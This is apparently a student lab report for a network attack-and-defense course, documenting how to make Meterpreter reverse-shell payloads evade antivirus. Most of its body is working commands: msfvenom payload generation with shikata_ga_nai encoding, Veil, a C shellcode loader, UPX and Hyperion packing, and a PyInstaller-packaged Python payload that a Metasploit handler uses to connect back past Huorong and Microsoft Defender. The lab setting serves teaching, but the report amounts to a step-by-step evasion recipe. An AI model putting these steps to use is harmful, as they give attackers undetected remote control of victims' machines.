20232307 2025-2026-1 《网络与系统攻防技术》实验三实验报告

20232307 2025-2026-1 《网络与系统攻防技术》实验三实验报告

1. 实验内容

本周学习内容:免杀一般是对恶意软件做处理，让它不被杀毒软件所检测。
杀毒软件原理包括：特征码、启发式、基于行为；文件校验和；云查杀；机器学习。
免杀技术包括：修改特征码；修改校验和；花指令免杀；加壳免杀；内存免杀。

(1)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧

• 正确使用msf编码器，使用msfvenom生成如jar之类的其他文件
• veil，加壳工具
• 使用C+shellcode编程

(2)通过组合应用各种技术实现恶意代码免杀。
如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。

(3)用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本。

2.实验要求

• 掌握免杀原理与技术
• 回答问题

（1）杀软是如何检测出恶意代码的？
①特征码检测：提取恶意代码的唯一特征，与杀软数据库中的特征库比对，命中即判定为恶意。
②基于行为分析：监控程序运行时的异常行为，比如主动连接陌生IP、修改系统注册表、注入其他进程、读取敏感文件，只要触发预设行为规则就会报警。
③启发式检测：不依赖已知特征，通过分析程序的可疑程度判断，比如代码包含大量混淆、无签名的可执行文件、频繁创建网络连接，结合算法判定为潜在恶意。
④云查杀：将可疑文件上传到云端，在隔离环境中运行，观察其完整行为，再结合全球威胁数据库判定是否为恶意。
⑤机器学习：收集大量样本，提取特征维度。用训练模型学习。预测时，对新文件提取相同维度的特征，输入训练好的模型。模型根据特征计算“恶意概率”，若超过阈值则判定为恶意。
⑥文件校验和：杀软厂商会对已知恶意文件计算校验和，当用户文件被扫描时，杀软会计算其校验和，与特征库比对。若匹配，则直接判定为恶意代码。

（2）免杀是做什么？
免杀一般是通过技术手段对恶意软件做处理，修改恶意代码的特征、行为或结构，让它不被杀毒软件所检测，或判定其为恶意。

（3）免杀的基本方法有哪些？
①修改特征码：特征码是能识别一个程序是一个病毒的一段不大于64字节的特征串。定位特征码并修改。
②修改校验和：定位特征码和校验和，修改特征码时需要同步重新计算校验和
③花指令免杀：花指令是否存在对程序的执行结果没有影响。为一个程序添加一段花指令之后，程序的部分偏移会受到影响，如果反病毒软件不能识别这段花指令，那么它检测特征码的偏移量会整体位移一段位置，自然也就无法正常检测木马。
④加壳免杀：是利用特殊的算法，对EXE、ELF、DLL文件里的资源进行压缩或者加密。压缩或加密之后的文件可以独立运行，解压或解密过程完全隐蔽，当我们运行这个加壳的程序时，系统首先会运行程序的“壳”，然后由壳将加密的程序逐步还原到内存中，最后运行程序。

3.实验过程

3.1 正确使用msf编码器，使用msfvenom生成如jar之类的其他文件

3.1.1 免杀效果参考基准

使用检测平台VirusTotal
VirusTotal平台需要人机验证，这一步会有点麻烦，建议使用网易邮箱（@163.com）登录，会免其困扰。

kali虚拟机IP：192.168.190.137

• msfvenom直接生成meterpreter可执行文件

使用如下命令：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.137 PORT=2307 -f exe > met.exe

利用Metasploit框架的msfvenom工具生成Windows平台的反向TCP后门程序。LHOST=192.168.190.137，设置的是攻击者的IP地址（Kali虚拟机的IP），靶机会主动向该IP发起连接。-f exe：指定输出格式 Windows可执行文件。

然后把生成的文件传输到windows主机上，使用VirusTotal检测其安全性，检测结果为50/70。即有70个杀毒引擎检测这个文件，有50个杀毒引擎判断其为恶意软件。
那么我们就以50/70为免杀效果参考基准。

3.1.2 使用msfvenom生成其他文件

3.1.2.1 生成编码的exe文件

使用如下命令：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.190.137 LPORT=2307 -f exe -o 2307ex3-2.exe --platform windows --arch x86

利用msfvenom生成经过编码优化的Windows平台反向TCP后门程序。此处我使用--platform windows强制指定平台，明确目标平台为Windows；使用--arch x86强制指定架构：明确目标 CPU 架构为x86。

将2307ex3-2.exe传输到windows主机后使用VirusTotal检测，可以得到检出率为45/72，与参考基准相比较略有效果，算是有稍许的免杀效果吧。

• 对文件进行10次编码

使用如下命令：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -i 10 -b '\x00' LHOST=192.168.190.137 LPORT=2307 -f exe > 20232307ex3-3.exe

使用shikata_ga_nai编码器对 payload进行编码，编码迭代次数为10次，将生成的内容输出到名为20232307ex3-3.exe的文件中。

将2307ex3-3.exe传输到windows主机后使用VirusTotal检测，可以得到检出率为44/72

1次编码和10次编码差别不大，没什么好的免杀效果。

3.1.2.2 生成jar文件和编码的jar文件

使用如下命令：

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.190.137 LPORT=2307 x>metjar20232307.jar

payload类型是Java环境下的反向TCP连接型Meterpreter，将生成的内容输出到名为metjar20232307.jar的文件中，这是一个 Java归档文件，可在安装了JRE的系统中运行。

将metjar20232307.jar传输到windows主机后使用VirusTotal检测，可以得到检出率为35/64

与前面的编码的exe文件相比，免杀效果得到了一定的提升，颇有成效！

• 对文件进行10次编码

使用如下命令：

msfvenom -p java/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.190.137 LPORT=2307 x>met-encode-jar20232307.jar

使用shikata_ga_nai编码器对payload进行编码，目的是通过混淆代码尝试规避杀毒引擎的静态特征检测。-i 10：设置编码迭代次数为 10 次。

将met-encode-jar20232307.jar传输到windows主机后使用VirusTotal检测，可以得到检出率为35/66

可见，1次编码和10次编码根本就没有什么区别...
可能原因：Java.jar文件的编码迭代效果有限，可能原因是编码器与Java平台不兼容、字节码易分析性强，且检测技术已针对Java恶意程序的特征进行了专项优化。

3.1.2.3 生成php文件和编码的php文件

使用如下命令：

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.190.137 LPORT=2307 x> metphp_20232307.php

payload类型为PHP环境下的反向TCP连接型Meterpreter，将生成的恶意代码输出到名为metphp_20232307.php的文件中。

将metphp_20232307.php传输到windows主机后使用VirusTotal检测，可以得到检出率为24/61

与前面生成的jar文件相比，免杀效果再一次得到了提升，免杀效果已经从基准的50下降到了24，颇有成效！

• 对文件进行10次编码

使用如下命令：

msfvenom -p php/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.190.137 LPORT=2307 x> met_20232307_10.php

使用shikata_ga_nai编码器对PHP payload进行编码，设置编码迭代次数为10次，通过增加代码复杂度提升免杀概率。

将metphp_20232307_10.php传输到windows主机后使用VirusTotal检测，可以得到检出率为8/62

迄今为止免杀效果最好的一次！php文件+10次编码，检出率由基准的50/72下降到了8/62！

3.2 使用veil免杀工具

3.2.1 下载veil

使用如下命令：

sudo apt -y install veil    #安装veil
/usr/share/veil/config/setup.sh --force  --silent  #这一步耗费了相当长的时间啊！！！

强制以静默模式运行 Veil 工具的安装并配置脚本

3.2.2 使用veil生成可执行文件

使用如下命令：

veil
Veil>：use 1
Veil>：list
Veil>：ues 7

输入use 1进入Evasion躲避模式，用以专门生成能够躲避主流杀毒软件检测的恶意可执行文件。输入命令list查看可用的载荷种类。

在此处选择c/meterpreter/rev_tcp.py，输入use 7，用于生成C语言格式的Meterpreter反向TCP payload的脚本。

选择后输入配置信息：

set LHOST 192.168.190.137 
set LPORT 2307 
generate   #开始生成载荷

将payload20232307.exe传输到windows主机后使用VirusTotal检测，可以得到检出结果为39/71

感觉免杀效果还可以吧。

3.3 C语言调用shellcode

使用如下命令：

msfvenom -p windows/meterpreter/reverse tcp LHOST=192.168.190.137 LPORT=2307 -f c

指定payload类型为Windows系统下的反向TCP连接型Meterpreter，以C语言数组形式输出恶意载荷。

使用vim编辑器，给上面生成的恶意代码添加一个main函数，函数如下所示：

int main() {
int(*func)()=(int(*)())buf;
func();
}

添加效果如下图所示：

使用 MinGW-w64 编译器将C文件编译为可执行文件，使用如下命令：

i686-w64-mingw32-g++ shell_2307.c -o shellcode_20232307.exe

可以查找到文件：

将shellcode_20232307.exe传输到windows主机后使用VirusTotal检测，可以得到检出结果为40/71

感觉免杀效果一般。

3.3 使用加壳工具

3.3.1 使用压缩壳UPX

使用如下命令：

upx shellcode_20232307.exe -o shellcode_20232307_upx.exe

对shellcode_20232307.exe原文件进行压缩处理，-o参数指定输出文件的名称，这里将压缩后的文件命名为shellcode_20232307_upx.exe。

将shellcode_20232307_upx.exe传输到windows主机后使用VirusTotal检测，可以得到检出结果为43/72

压缩壳有一定的免杀效果，但是效果不显著。作为流行这么多年的加壳软件，也是可理解的。

3.3.2 使用加密壳

使用如下命令：

cp shellcode_20232307.exe /usr/share/windows-resources/hyperion/   #复制文件
cd /usr/share/windows-resources/hyperion      #切换目录

首先将可执行文件shellcode_20232307.exe复制到Hyperion工具的资源目录中，然后切换当前工作目录至hyperion工具的安装目录

wine hyperion.exe -v shellcode_20232307.exe shellcode_hyp_20232307.exe

通过Wine工具运行Windows平台的hyperion加密程序，对指定可执行文件进行加密处理，加密后文件输出到shellcode_hyp_20232307.exe。

可以在路径下查找到文件：

将shellcode_hyp_20232307.exe传输到windows主机后使用VirusTotal检测，可以得到检出结果为51/71

加密壳的免杀效果非常一般。原因就在于加密过的代码段的熵太高。

3.4 组合使用msfvenom工具与加壳技术

3.4.1 使用msf + 压缩壳

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00'LHOST=192.168.190.137 LPORT=2307 -f c> 20232307_shellcode_multi.c    #生成Windows反向TCP Meterpreter载荷，经10次shikata_ga_nai编码，以C数组形式保存到文件
vim 20232307_shellcode_multi.c    #通过vim编辑器向文件中添加main()函数
i686-w64-mingw32-g++ 20232307_shellcode_multi.c -o 20232307_shellcode_multi.exe    # 使用MinGW-w64编译器将C文件编译为32位Windows可执行文件

在相应路径下可以查看到生成的文件

再使用如下指令对刚刚的20232307_shellcode_multi.exe文件进行加压缩壳：

upx 20232307_shellcode_multi.exe -o 20232307_shellcode_multi_2.exe

将20232307_shellcode_multi.exe和20232307_shellcode_multi_2.exe传输到windows主机后使用VirusTotal检测

20232307_shellcode_multi.exe（不加压缩壳）的检出结果是33/72

20232307_shellcode_multi.exe（加压缩壳）的检出结果是35/72

3.4.2 使用msf + 加密壳

使用如下命令：

cp 20232307_shellcode_multi_2.exe /usr/share/windows-resources/hyperion/    #将可执行文件复制到Hyperion的目录
cd /usr/share/windows-resources/hyperion    #切换到Hyperion工具所在目录
wine hyperion.exe -v 20232307_shellcode_multi_2.exe 20232307_shellcode_multi_3.exe    #通过wine运行Hyperion加密工具，对指定可执行文件进行加密，输出加密后的文件

将20232307_shellcode_multi_3.exe传输到windows主机后使用VirusTotal检测，检出结果是50/71

杀毒软件查杀：
此处使用火绒安全，版本是6.0.7.14

使用自定义查杀，检测刚刚生成的三个文件：

如上图所示，都没逃过杀毒软件的查杀啊！！！

最后再换一种组合技：

3.4.3 使用Metasploit框架生成Python格式的Meterpreter反向TCP payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.190.137 LPORT=2307 -f raw >20232307_py.py

通过msfvenom生成基于Python的恶意脚本。指定payload类型为Python环境下的反向向TCP连接型 Meterpreter，将生成的恶意代码输出到名为20232307_py.py的Python脚本文件中。

在相应的路径里面可以查找到生成的python文件

python文件传输到windows主机后，使用如下命令，将python脚本文件打包成可执行文件

pyinstaller -Fw --hidden-import=getpass --hidden-import=code --hidden-import=platform --hidden-import=shlex 20232307_py.py

将Python脚本及其依赖项打包为独立的可执行文件并且将所有代码、依赖库和资源打包成一个单独的可执行文件。分别指定了getpass（处理密码输入）、code（交互式解释器相关）、platform（获取系统信息）、shlex（解析命令行参数）四个模块，确保打包后能正常运行。

将生成的可执行文件放入VirusTotal平台进行检测，得到检测结果12/72，效果还是不错的！

使用火绒安全查杀：

杀软并没有检测出异常

使用windows里面的Microsoft Defender再次检测：

依然没有检测出异常，成功了！！

3.5 杀软开启的情况下实现回连

使用3.4.3中的方法（Metasploit框架生成Python格式的Meterpreter反向TCP payload）：

kali虚拟机中打开Metasploit
使用命令如下：

msfconsole
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp   //注意此处命令不同于实验二，此处是python/meterpreter/reverse_tcp,而不是windows/meterpreter/reverse_tcp
set LHOST 192.168.190.137
set LPORT 2307
exploit

结果如下图所示：

windows主机中运行20232307_py.exe文件实现回连
20232307_py.exe

kali虚拟机中输入dir,可以看到20232307_py.exe所在文件夹的目录。

回连成功！

4.问题及解决方案

• 问题一：

在3.1.2.1的生成exe文件中，我使用命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.190.137 LPORT=2307 -f exe -o 2307ex3-2.exe --platform windows --arch x86时出现报错，如下图所示：

• 问题一解决方案：

这个错误的原因是字符编码不兼容，具体是 UTF-8 和 ASCII-8BIT 编码之间的冲突。
使用命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.190.137 LPORT=2307 -f exe -o 2307ex3-2.exe --platform windows --arch x86 后运行成功

• 问题二：

在 3.4.3 使用Metasploit框架生成Python格式的Meterpreter反向TCP payload这一步骤的“windows将python脚本打包成可执行文件”输入指令：pyinstaller -Fw --hidden-import=getpass --hidden-import=code --hidden-import=platform --hidden-import=shlex 20232307_py.py时出现报错，如下图所示：

• 问题二解决方案：

这是PyInstaller 未安装或未配置到系统环境变量导致的。运行pip3 install pyinstaller后再运行原指令即可解决。

5.学习思考及感悟

本次实验耗费了我比较长的时间，下载veil的过程真的是相当折磨，我也是寻求了多方的帮助，也尝试了多种各种各样的下载方式，也在此非常感谢同学们的帮助。在最后的回连操作中也是尝试了好多“组合技”，最终使用Metasploit框架生成Python格式的Meterpreter反向TCP payload终于成功了。
本次实验主要是关于免杀的原理与技术的实践，这让我认识到恶意代码生成是如此容易，并且最终我也做到了生成的恶意代码文件不被win 11系统所检测到，并且也不被杀毒软件所检测杀死，这也警示我在使用网络的过程中要谨防后门、恶意代码等。
在实验过程中还有一个比较深刻的体会是在执行命令行的过程中一定要理解这个命令到底是什么意思，千万不能直接无脑复制粘贴，理解命令的意思还可以帮助我们规避很多问题，不至于在解决一些无脑问题上耗费大量时间。
实验的过程并不是一帆风顺的，需要我有足够的理解力、耐心和细心，希望自己可以在下一次的实验中能有所进步。

参考资料

• 实验三实验指导书
• 20222408 2024-2025-1 《网络与系统攻防技术》实验三实验报告
• 免杀Payload生成工具Veil的下载与使用